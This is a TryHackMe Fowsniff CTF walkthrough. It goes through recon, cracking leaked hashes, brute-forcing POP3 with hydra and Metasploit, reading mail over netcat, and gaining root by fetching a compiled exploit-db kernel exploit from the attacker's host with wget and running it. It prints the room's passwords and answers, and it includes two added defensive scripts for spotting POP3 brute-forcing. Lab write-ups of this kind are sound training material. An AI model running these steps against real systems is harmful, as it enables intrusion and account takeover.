Fowsniff CTF — Walkthrough-TryHackMe

G N Vivekananda
8 min read, Jul 1, 2021

Visit https://tryhackme.com/room/ctf and join the room.

Attacker VPN IP: 10.9.227.16

Target IP: 10.10.89.175 / 10.10.193.216 (both addresses appear in the commands below)

Table of Contents:

Port scanning and IP discovery.

Hitting on port 80

Finding hashes on Pastebin

Decoding hashes

Brute force pop3 login

Connecting to pop3

Finding SSH username and password

Finding privilege escalation vectors

Exploiting Misconfiguration in system

Getting root access.

Reading the flags.

Reconnaissance

nmap -Pn -A 10.10.89.175

The Nmap output shows us that there are 4 ports open: 22 (SSH), 80 (HTTP), 110 (POP3), 143 (IMAP).

We find that port 80 is running http, so we open the IP in our browser.

http://10.10.89.175/

Let us see the source of the page.

I didn’t find any helpful info.

Let us brute-force directories using gobuster, dirb or a nikto scan.

gobuster dir -u http://10.10.89.175 -w /usr/share/dirb/wordlists/common.txt

We don’t find anything on the webpage. gobuster also didn’t reveal anything.

The page itself contains some information worth reading.

After reading this text, I saw that this company has suffered a data breach. There is a strong possibility that employee information has been exposed on the Internet by hackers. So we googled “fowsniff corp” and found a Pastebin link that contained usernames and passwords.

Finally, we found some interesting information. In the above screenshot, we can see some email IDs and password hashes from the POP3 service. And we already know from Step 2 that the POP3 port was open. So, this information is beneficial for us.

But these are the hashes of the passwords. We need to find out the passwords. In the next step, let’s try to crack these passwords by using online password-cracking tools.

So far, we have the password hashes of the POP3 users. Now let’s try to crack them. We’ll be using the CrackStation online password-cracking application, which takes password hashes as input and tries to crack them. It’s simple: copy-paste the hashes, click on “Crack Hash,” and it returns the plain-text password if the hash is successfully cracked.

We cracked the hashes using this site and found the passwords for the respective email addresses. But only 8 hashes were cracked, and there are 9 usernames.

Now we have the POP3 service running on the target machine and the usernames and passwords. In the next step, we will try to log in with the credentials.

Now we need to check whether these credentials are correct or not. We could do this manually in the current scenario because there are only nine usernames and passwords. But if there were hundreds of credentials, we would need a tool for it, so let’s use a tool here as well.

For this, we’ll copy the username and password in two separate files. I created two files, userfow.txt and passfow.txt, and copy-pasted the identified credentials.

Using the usernames and passwords you captured, can you use Metasploit to brute force the pop3 login?

Here I started Metasploit with

msfconsole

and used

search pop3

Let’s use the first entry called “POP3 Login Utility” with:

use 0

To see what I can do with this, I entered:

show options

One option I had to set is RHOSTS to tell the module who the victim is:

set rhosts 10.10.89.175

I made a text file with all the usernames and passwords in one. Here I used:

set user_file userfow.txt

set pass_file passfow.txt

set verbose false

run

After creating two separate files for usernames and passwords, I used the hydra tool to check the credentials. It can be seen in the screenshot given below. Either of the commands below can be used.

hydra -L userfow.txt -P passfow.txt pop3://10.10.193.216

hydra pop3://10.10.193.216 -L userfow.txt -P passfow.txt

We can see that there is a user named seina who has not changed her password until now. We can use these credentials to log into the POP3 service.
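Hydra and the Metasploit POP3 Login Utility leave the same footprint on the mail server: a burst of failed POP3 logins from one address, followed by a success if a reused password is found. The script below is an added example, not part of the original write-up, that spots that pattern in constructed log lines; the Dovecot-style line format and all usernames other than seina and baksteen are assumed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log, loosely modelled on Dovecot pop3-login lines (format assumed;
# adapt LINE_RE to your server). One IP tries many users in seconds, then one login succeeds.
SAMPLE_LOG = """\
Jul  1 10:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<ahaus>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 10:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<bkoch>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 10:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<cmeyer>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 10:00:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<dweiss>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 10:00:05 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<eroth>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 10:00:06 mail dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=10.9.227.16, lip=10.10.193.216
Jul  1 11:15:00 mail dovecot: pop3-login: Login: user=<baksteen>, method=PLAIN, rip=10.10.14.5, lip=10.10.193.216
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, "
    r"method=\S+, rip=(?P<rip>[\d.]+)"
)

def parse(line, year=2021):
    """Return a dict for one pop3-login event, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["outcome"] == "Login", "user": m["user"], "rip": m["rip"]}

def detect(lines, threshold=5, window=60):
    """Alert when one source IP fails `threshold` logins within `window` seconds
    (a spray if the failures span several users), and again if it then succeeds."""
    events = sorted(filter(None, map(parse, lines)), key=lambda e: e["ts"])
    recent, flagged, alerts = defaultdict(list), set(), []
    for e in events:
        if e["ok"]:
            if e["rip"] in flagged:
                alerts.append(("success_after_bruteforce", e["rip"], e["user"]))
            continue
        q = recent[e["rip"]]
        q.append(e)
        while (e["ts"] - q[0]["ts"]).total_seconds() > window:  # slide the window
            q.pop(0)
        if len(q) >= threshold and e["rip"] not in flagged:
            flagged.add(e["rip"])
            users = sorted({x["user"] for x in q})
            alerts.append(("password_spray" if len(users) > 1 else "bruteforce", e["rip"], users))
    return alerts
```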

Many POP clients can be used to connect to POP3, but based on the hint, I prefer to use netcat (nc) for this. It can be seen in the following screenshot.

Command Used:

nc 10.10.193.216 110

USER seina

PASS scoobydoo2

LIST

In the above screenshot, we can see that first, we used the nc command shown above to connect to the POP3 service on port 110. After that, I used USER seina to enter the username for the POP3 service and PASS scoobydoo2 to supply the password for login.

After that, we can see in the output that we are successfully authenticated in the POP3 service. I used the LIST command to see the messages available for that user. There are two messages in this account.

In this step, we use the RETR 1 command to retrieve the message. It can be seen in the following screenshot.

Command Used: RETR 1

I found an SSH temporary password by reading this email, which can be seen in the highlighted area of the above screenshot. The password is given below.

SSH Temporary Password: “S1ck3nBluff+secureshell”

Now, we have one SSH temporary password. Since the SSH port was found open in Step 2, let’s try to log in with this password. But there is one problem: we don’t have the username. We retrieved the second message and found a message that hints that it uses the username “baksteen.”

RETR 2
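The POP3 exchange above (USER, PASS, LIST, RETR), walked through as an added example that is not part of the original write-up: it parses a constructed RFC 1939 style reply stream, handling multi-line replies and dot-stuffing, and then lists which users authenticated in cleartext, which is the reason to expose POP3 only over TLS. The server banner, message sizes and mail body are invented.

```python
from io import BytesIO
# Client commands from the session above; server replies are a constructed stream (mail body invented).
CLIENT = ["USER seina", "PASS scoobydoo2", "LIST", "RETR 1", "QUIT"]
SERVER = (
    b"+OK POP3 server ready\r\n"
    b"+OK\r\n+OK Logged in.\r\n"                                # USER, PASS
    b"+OK 2 messages:\r\n1 1622\r\n2 1280\r\n.\r\n"              # LIST (multi-line)
    b"+OK 1622 octets\r\nFrom: it@example.invalid\r\nSubject: Temporary password\r\n"
    b"\r\n..A body line that starts with a dot\r\nNew password: [placeholder]\r\n.\r\n"
    b"+OK Bye\r\n"                                              # QUIT
)
MULTILINE = {"LIST", "RETR", "TOP", "UIDL", "CAPA"}  # multi-line on +OK, except LIST n / UIDL n

def read_response(stream, command):
    """Read one reply; multi-line replies end with a lone '.', and a body line that
    itself starts with '.' is dot-stuffed as '..' (RFC 1939 section 3)."""
    status = stream.readline().rstrip(b"\r\n").decode()
    verb = command.split()[0].upper()
    multi = verb in MULTILINE and not (verb in {"LIST", "UIDL"} and " " in command.strip())
    body = []
    if multi and status.startswith("+OK"):
        while True:
            raw = stream.readline()
            if not raw:
                raise ValueError("stream ended inside a multi-line reply")
            line = raw.rstrip(b"\r\n")
            if line == b".":
                break
            body.append((line[1:] if line.startswith(b".") else line).decode())
    return status, body

def run_session(commands, server_bytes):
    """Pair each client command with the reply it receives; the server speaks first."""
    stream = BytesIO(server_bytes)
    transcript = [("<greeting>",) + read_response(stream, "NOOP")]
    for cmd in commands:
        transcript.append((cmd,) + read_response(stream, cmd))
    return transcript

def cleartext_logins(transcript):
    """Defender's check: USER/PASS cross plain port 110 unencrypted, so every user
    whose PASS was accepted had a credential visible to anyone on the path."""
    user, seen = None, []
    for cmd, status, _ in transcript:
        verb, _, arg = cmd.partition(" ")
        if verb.upper() == "USER":
            user = arg
        elif verb.upper() == "PASS" and status.startswith("+OK"):
            seen.append(user)
    return seen
```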

We use the credentials “baksteen: S1ck3nBluff+secureshell” to log in through SSH.

ssh baksteen@10.10.193.216

After the login, we can see the $ prompt, which indicates that this is not the root user. This means we need to spend some more time on this CTF, because the target of this CTF is to get root access. I ran the uname -a command, which gives information about the kernel.

After getting the shell, I came to know that I have logged in as a normal user. To get the root flag, we must be the root user on this machine. Let’s not wait any longer.

From the output of the above command, we found that it is running on Ubuntu, and the kernel version is 4.4.0.116-generic.

Privilege Escalation

From our low-privileged user shell, we can enumerate the system further. Our user does not have any sudo privileges, and we cannot access any of the other user’s home directories.

In our earlier enumeration, I found that the machine is running an old version of Ubuntu, so I searched exploit-db for an exploit for the same.

After that, I opened the ExploitDB URL and copied the download URL.

After that, I used the wget utility to download the exploit on the attacker’s machine. Once the exploit was downloaded, I renamed it using the mv command and used the gcc compiler to compile it. Once the compiling process was completed, an exploit file was generated.

Commands Used:

cd /var/www/html/

wget https://www.exploit-db.com/download/44298

mv 44298 44298.c

gcc 44298.c -o exploit

/etc/init.d/apache2 start

ifconfig

When the exploit had successfully compiled, I started the apache2 service to transfer this exploit to the target machine.

I changed my current directory to the tmp directory on the target machine and downloaded the exploit by using the wget utility. After that, I gave it executable permission by using the chmod command. Then I ran the exploit, which gave me root access to the target machine. All the commands and their output can be seen highlighted in the following screenshot.

Commands Used:

cd /tmp/

wget 10.9.227.16/exploit

chmod +x exploit

./exploit

Now we have root access to the target machine. Let’s find the flag and complete the CTF.

I read the flag file in the tmp directory by using the cat command. The flag can be seen in the following screenshot.

Done!!!!!! Let us see the answers to the challenge questions now.

What was seina’s password to the email service?

scoobydoo2

Looking through her emails, what was a temporary password set for her?

S1ck3nBluff+secureshell

Thank you very much for reading. As I always mention in every blog, suggestions are always welcome, and I am open to discussing other methods to complete the same task. I hope you find this useful, and if there is something you would like to add or any suggestions, you can contact me anytime.
